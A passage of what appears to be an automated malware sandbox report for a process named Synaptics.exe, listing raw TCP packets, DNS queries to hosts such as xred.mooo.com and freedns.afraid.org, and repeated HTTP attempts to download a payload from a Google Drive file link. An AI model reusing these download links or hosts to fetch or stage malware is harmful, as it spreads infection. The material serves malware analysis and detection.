                                                                                                        Dec 30, 2024 11:49:24.674242973 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.678016901 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.678035021 CET44349843142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.687251091 CET44349831142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.687297106 CET44349831142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.687361002 CET49831443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.687397957 CET44349831142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.687402964 CET49831443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.687407970 CET44349831142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.687436104 CET49831443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.687464952 CET49831443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.772524118 CET49831443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.772567987 CET44349831142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.778776884 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.778831005 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:24.778892040 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.779655933 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:24.779669046 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:25.224864960 CET44349841142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:25.224952936 CET49841443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:25.302726984 CET44349842142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:25.302822113 CET49842443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:25.380853891 CET44349843142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:25.380913019 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:25.402664900 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:25.402720928 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.184899092 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.184942961 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.185281038 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.185287952 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.185703993 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.185736895 CET44349843142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.185890913 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.185897112 CET44349843142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.186252117 CET49842443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.186281919 CET44349842142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.186424971 CET49842443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.186431885 CET44349842142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.186548948 CET49841443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.186563015 CET44349841142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.186762094 CET49841443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.186767101 CET44349841142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.479080915 CET44349841142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.479218006 CET49841443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.479743958 CET44349841142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.479784012 CET44349841142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.479798079 CET49841443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.479832888 CET49841443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.486320019 CET44349842142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.486392021 CET49842443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.486412048 CET44349842142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.486562014 CET49842443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.487613916 CET44349842142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.487662077 CET44349842142.250.186.78192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.487668991 CET49842443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.487735033 CET49842443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.671577930 CET44349843142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.671627045 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.671631098 CET44349843142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.671643019 CET44349843142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.671678066 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.672328949 CET44349843142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.672383070 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.672390938 CET44349843142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.672404051 CET44349843142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.672431946 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.672441959 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.683878899 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.683932066 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.683933973 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.683948040 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.683988094 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.684003115 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.684050083 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.684058905 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.684071064 CET44349844142.250.185.161192.168.2.9
                                                                                                        Dec 30, 2024 11:49:39.684103012 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.684112072 CET49844443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.917184114 CET4977080192.168.2.969.42.215.252
                                                                                                        Dec 30, 2024 11:49:39.917535067 CET49841443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.917613029 CET49843443192.168.2.9142.250.185.161
                                                                                                        Dec 30, 2024 11:49:39.917615891 CET49842443192.168.2.9142.250.186.78
                                                                                                        Dec 30, 2024 11:49:39.917639971 CET49844443192.168.2.9142.250.185.161
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 30, 2024 11:49:17.802645922 CET | 49761 | 53 | 192.168.2.9 | 1.1.1.1
Dec 30, 2024 11:49:17.810094118 CET | 53 | 49761 | 1.1.1.1 | 192.168.2.9
Dec 30, 2024 11:49:18.665357113 CET | 55000 | 53 | 192.168.2.9 | 1.1.1.1
Dec 30, 2024 11:49:18.672677994 CET | 53 | 55000 | 1.1.1.1 | 192.168.2.9
Dec 30, 2024 11:49:18.675158024 CET | 63546 | 53 | 192.168.2.9 | 1.1.1.1
Dec 30, 2024 11:49:18.682621956 CET | 53 | 63546 | 1.1.1.1 | 192.168.2.9
Dec 30, 2024 11:49:18.856009960 CET | 65318 | 53 | 192.168.2.9 | 1.1.1.1
Dec 30, 2024 11:49:18.863430977 CET | 53 | 65318 | 1.1.1.1 | 192.168.2.9
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 30, 2024 11:49:17.802645922 CET | 192.168.2.9 | 1.1.1.1 | 0x5ab4 | Standard query (0) | docs.google.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:49:18.665357113 CET | 192.168.2.9 | 1.1.1.1 | 0x284a | Standard query (0) | xred.mooo.com | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:49:18.675158024 CET | 192.168.2.9 | 1.1.1.1 | 0x8fe8 | Standard query (0) | freedns.afraid.org | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:49:18.856009960 CET | 192.168.2.9 | 1.1.1.1 | 0xb3e6 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 30, 2024 11:49:09.321660042 CET | 1.1.1.1 | 192.168.2.9 | 0x4a8c | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 30, 2024 11:49:09.321660042 CET | 1.1.1.1 | 192.168.2.9 | 0x4a8c | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:49:17.810094118 CET | 1.1.1.1 | 192.168.2.9 | 0x5ab4 | No error (0) | docs.google.com | | 142.250.186.78 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:49:18.672677994 CET | 1.1.1.1 | 192.168.2.9 | 0x284a | Name error (3) | xred.mooo.com | none | none | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:49:18.682621956 CET | 1.1.1.1 | 192.168.2.9 | 0x8fe8 | No error (0) | freedns.afraid.org | | 69.42.215.252 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:49:18.863430977 CET | 1.1.1.1 | 192.168.2.9 | 0xb3e6 | No error (0) | drive.usercontent.google.com | | 142.250.185.161 | A (IP address) | IN (0x0001) | false
Dec 30, 2024 11:50:21.531029940 CET | 1.1.1.1 | 192.168.2.9 | 0x9825 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 30, 2024 11:50:21.531029940 CET | 1.1.1.1 | 192.168.2.9 | 0x9825 | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
                                                                                                        • docs.google.com
                                                                                                        • drive.usercontent.google.com
                                                                                                        • freedns.afraid.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49770 | 69.42.215.252 | 80 | 1360 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
Dec 30, 2024 11:49:18.688421965 CET | 154 | OUT | GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
User-Agent: MyApp
Host: freedns.afraid.org
Cache-Control: no-cache
Dec 30, 2024 11:49:19.278332949 CET | 243 | IN | HTTP/1.1 200 OK
                                                                                                        Server: nginx
                                                                                                        Date: Mon, 30 Dec 2024 10:49:19 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        Vary: Accept-Encoding
                                                                                                        X-Cache: MISS
                                                                                                        Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 1fERROR: Could not authenticate.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49762 | 142.250.186.78 | 443 | 1360 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:18 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2024-12-30 10:49:18 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:18 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-aHZw2-8Ul8ImyAur4eVzaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port
1 | 192.168.2.9 | 49761 | 142.250.186.78 | 443
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:49:18 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
User-Agent: Synaptics.exe
Host: docs.google.com
Cache-Control: no-cache
2024-12-30 10:49:18 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:18 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-i7gCimGQFXGGjv24YdPTyw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        2 | 192.168.2.9 | 49771 | 142.250.186.78 | 443 | 1360 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-30 10:49:19 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2024-12-30 10:49:19 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:19 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-B7VtcYji7D9wt0FJD15Hcw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        3 | 192.168.2.9 | 49772 | 142.250.185.161 | 443 | 1360 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-30 10:49:19 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-30 10:49:20 UTC | 1601 | IN | HTTP/1.1 404 Not Found
                                                                                                        X-GUploader-UploadID: AFiumC6ESPAnwcEORxv5p8CaLRmq2JSfZSC5hVBsHa5VCfAxhQX4g_w9awq9Vk4aWnkJyui-I3bvJhk
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:19 GMT
                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-qtThlVbzU-ZOr8HMLo0ehw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Length: 1652
                                                                                                        Server: UploadServer
                                                                                                        Set-Cookie: NID=520=qV6rTPWO8kpOHQ3mFtatW_ZseHmoLbgRYSqKkPwUEswZ4Y_LTJwPQr25o9sVjHpeGD0VKTZCD8drPB2qk5P5Ab0M0pvX0_ZvnIAdmjC7_UDvYU4yDVCjXtG5slbudraDZ_YhuVNtqq2CXG95knkGbXPKUsCWT9bmPblH5P3k3YIOIUfHgy-nnqU; expires=Tue, 01-Jul-2025 10:49:19 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                        Connection: close
                                                                                                        2024-12-30 10:49:20 UTC | 1601 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="T5PLeMliz8uBaCXdckbFBw">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                        2024-12-30 10:49:20 UTC | 51 | IN | Data Ascii: his server. <ins>Thats all we know.</ins></main>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        4 | 192.168.2.9 | 49774 | 142.250.186.78 | 443 | 1360 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-30 10:49:19 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2024-12-30 10:49:19 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:19 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-LNswrX5Dlev9_qdN1jNpvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        5 | 192.168.2.9 | 49773 | 142.250.185.161 | 443 | 1360 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-30 10:49:19 UTC | 186 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2024-12-30 10:49:20 UTC | 1594 | IN | HTTP/1.1 404 Not Found
                                                                                                        X-GUploader-UploadID: AFiumC6rDPlt-SAHHumlIj5byG2IKf-jgpwLBwl0unZTFwbt5VUNBIlhDHyJVQSGZT4XVH1j
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:19 GMT
                                                                                                        P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-TUYv8N5SmqvDCGP0Kra8dg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Content-Length: 1652
                                                                                                        Server: UploadServer
                                                                                                        Set-Cookie: NID=520=PxoMmSRKBx14w5cp_JcSq0hA869335W3PsBTSVHSRRHus_4lEn8VYZRhI8qw0HXdmz9MAFUa6Wm0u02De3CNgJrDYWXVcFCCjCmIU-NVaiNRMmKTXviZEgB2xD6neHjlQqPQlLMvq64K_trRAz5K3GYl8E_46EDUlSvIqztdVSKOr27yXb0zcVU; expires=Tue, 01-Jul-2025 10:49:19 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Content-Security-Policy: sandbox allow-scripts
                                                                                                        Connection: close
                                                                                                        2024-12-30 10:49:20 UTC | 1594 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fphLzuXZze2c7GRtJGL_Ng">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                        2024-12-30 10:49:20 UTC | 58 | IN | Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                        6 | 192.168.2.9 | 49785 | 142.250.186.78 | 443 | 1360 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                                                        2024-12-30 10:49:20 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                        User-Agent: Synaptics.exe
                                                                                                        Host: docs.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2024-12-30 10:49:20 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Mon, 30 Dec 2024 10:49:20 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Cross-Origin-Opener-Policy: same-origin
